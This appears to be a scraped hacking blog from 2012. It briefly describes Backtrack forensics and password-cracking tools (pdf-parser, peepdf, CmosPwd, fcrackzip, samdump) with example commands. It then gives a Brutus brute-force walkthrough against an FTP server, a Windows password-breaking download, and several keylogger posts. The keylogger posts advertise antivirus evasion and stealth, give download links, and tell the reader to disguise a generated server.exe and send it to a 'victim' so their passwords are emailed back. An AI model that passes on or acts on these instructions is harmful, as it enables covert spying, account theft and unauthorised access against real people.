pdf-parser is a program used to display detailed information about a PDF file. A very useful feature is the ability to run a stream of data thorugh a filter, such as FlateDecode and ASCIIHexDecode. These filters are sometimes used to obfuscate code in PDF files, so this feature can help expose exploit attempts. In addition to this, pdf-parser can display individual object and data streams, as well as provide statistics for the PDF document. In the example below, we use pdf-parser to provide an overview of the file.pdf PDF file using the –stats option.

Example Usage:pdf-parser.py –stats file.pdf
nbsp;

peepdf

peepdf is a very thorough utility that is used to analyze and edit PDF documents on the byte level. It offers the basic command line usage, but also offers an in depth interactive console. The command line usage provides a more basic overview of the PDF file, while the interactive console provides more powerful functions. In the first example, we use peepdf to provide an overview of file.pdf, while the second one shows how to enter interactive mode using file.pdf.

Example Usage:peepdf.py file.pdf
Example Usage:peepdf.py -i file.pdf

Password Forensics Tools -Backtrack

CmosPwd

CmosPwd is a BIOS password cracker. With support for many different models of BIOS, CmosPwd has different methods of cracking for each type of BIOS. Since a BIOS password prevents you from booting on that computer, it does require some physical manipulation. Once you get the hardware aspect out of the way, usage is very easy. In the following example, we kill CMOS all together.

Example Usage: cmospwd /k

fcrackzip

fcrackzip is a utility used to crack Zip file password protection. There are many Zip crackers out there, however, fcrackzip excels in speed and features, especially the brute force option. It is very easy to use, and in the examples below, we use it to crack a zip file called crack.zip using a brute force method and a dictionary based attack taking passwords from passwords.txt.

Example Usage:fcrackzip -b crack.zip
Example Usage:fcrackzip -D -p passwords.txt crack.zip

samdump

Samdump is a utility that can extract password hashes from SAM files. SAM files are the files located on Windows based systems that contain the passwords for local users. By using samdump, you can retrieve the password hashes, and then use them for cracking with another program. In this example, we retrieve hashes from an exported SAM file named sam.file.

Example Usage:samdump sam.file

How to hack IIS ( internet information server ) FTP password by useing Brute Force Attack

FTP is an application or service or protocol which can be used to transfer files from one place to another place ,it really comes very handy during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.




What is Brute-Force?

Brute-force is a type of attack in which every possible combination of letters, digits and special characters are tried until the right password is matched with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password.Here I will be using this attack to crack the password.So,lets start….
Requirements:
  1. The tool we will be using ” BrutusA2”(Download: http://www.hoobie.net/brutus/)
  2. You need to know the target suppose “ftp://123.123.xx.xxx”

Procedure:

Step 1.Here I have shown an authentication page of an FTP service in the image below and in the following steps we will crack its password using brutus.

Step 2.Now open up “Brutus” and type your desire target ,select wordlist and select “FTP” from the drop down menu and click start. If you are confused then follow the image below.


Step 3.The time it takes as I mentioned above depends on the complexity and length of the password.So after clicking the start button wait for the time as mentioned in the tool.The password will be displayed as shown above.
Recommendation: I would recommend the readers to try it in a virtual environment as I did and enjoy the trick.It is not advisable to try it on some unknown user without prior permission.

Monday, March 5, 2012

How To Break Windows Password

Hello friends I have found for you a very easy and effective method for breaking windows Password with this software you can easily break Administrator password , user account passwords .You can also break advance level of passwords like SYSKEY password , Facial Expression Password , and Thumb Recognition passwords. the Syskey password is very strong password if you forget the password there is no option to recover this password .you will have to install new windows. But now there is no need to install windows .you can easily break any password of windows in any OS. If you have forgotten your password, or your computer is locked out, or you do not have access to the password of the system, you only need to boot from this software from CD/DVD/USB to reset your lost password. Then you can get back into your system in a minute. No need to call a technician, no need to re-install anything, and you certainly don't need to reformat.



Download ISO File ::  Windows Password Recovery


Enjoy Hacking..;)

Sunday, March 4, 2012

Free download isteal Keylogger v2

Features of our latest keylogger:-

  • 100% FUD from all anti-virus
  • Send Logs To Emails ( gmail,yahoo,aol,hotmail ) and Ftp account
  • Decreased Server Size
  • Optimized Memory UsageIcon Changer
  • Time Setter
  • Melt server after using
  • Start up adder
  • Became active after every start up of windows
  • And many other features



How To Use This Remote Keylogger :-

  • Download keylogger from below and extract that 
  • Give them the required information
  • Create New Gmail Account Specially for keylogger ( its recommended )
  • And Log that gmail username and password in keylogger
  • Now Click on build
  • It will create a server.exe
  • Send that Server.exe to victim and ask them to run
  • You done the all task now you will receive the logs to the given gmail account



Download Here
http://www.ziddu.com/downloadlink/13205398/iStealKeys_v2.rar 

download Award keylogger


Award Keylogger is fast, invisible and easy-to-use surveillance tool that allows you to find out what other users do on your computer in your absence. It records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.

Main Features:

New! Run keylogger as a Windows service
Easy-to-use, even for beginners 
Absolutely invisible/stealth mode
Logs accounts and passwords typed in the every application, (Only Award Keylogger Pro can record passwords in IE7/8/9)
Logs message typed in all instant messengers
Visual surveillance, support screenshots view 
Slide show for screenshots 
Captures the contents behind the asterisks 
Captures mouse clicks 
Logs websites visited (Award Keylogger Pro only)
Captures AOL/AIM/Yahoo/ICQ chats 
Keyword Detection and Notification 
Records contents of password protected web pages, including Web Mail messages 
Logs Windows Clipboard 
Sends log by e-mail 
Uploads ALL logs into the separate folders by FTP 
Invisible for the firewall program 
Invisible in the Windows startup list 
Monitors all users of the PC 
User friendly HTML file format for emailed logs 
Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List 
Records Windows 9.x/Me/2000/XP/VISTA logon passwords  
Intercepts DOS-box and Java-chat keystrokes 
Supports international keyboards 
External log viewer 
Supports printing of the log 
Optimized for Windows XP 
Exports log to HTML 


Download Here:
http://www.ziddu.com/download/13492716/Award_Keylogger_1.27.rar.html

How to hack facebook, twitter, Gmail password using Winspy Keylogger


How to hack facebook, twitter, Gmail password using Winspy Keylogger


Keylogger is also onr of the best ways to hack password of facebook, gmail or any other website account. In this post i am going to show how to hack passwords using winspy keylogger.
Read the steps givn below:


1. First of all get your Winspy keylogger. Download it 
2. After downloading, run the program and create the user id and pasword. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Then a new dialog box will open to show you the hotkey (Ctrl + Shift + F12 ) to start keylogger.
4. Now press the hot key written in last step to go to the login form and enter login details to login.
5. Now you are on main screen of the software. CLink on remote at top and then remote install.

  • user – type in the victim’s name
  • file name – Name the file to be sent. Use the name such that victim will love to accept it.
  • file icon – keep it the same
  • picture – select the picture you want to apply to the keylogger.



In the textfield of “Email keylog to” , enter your email address. 
6.click on “Create Remote file”.


You just need to send ths file to the person whom you want to hack. If victim runs this on his system, you will get all his keylogs in your email. Check for passwords in keylogs..

download iStealer keylogger | remote keylogger





How To Use This Remote Keylogger :-

  • Download keylogger from below and extract that 
  • Give them the required information
  • Create New Gmail Account Specially for keylogger ( its recommended )
  • And Log that gmail username and password in keylogger
  • Now Click on build
  • It will create a server.exe
  • Send that Server.exe to victim and ask them to run
  • You done the all task now you will receive the logs to the given gmail account



Download
http://www.4shared.com/file/j8j5q3eO/iStealer_30.html?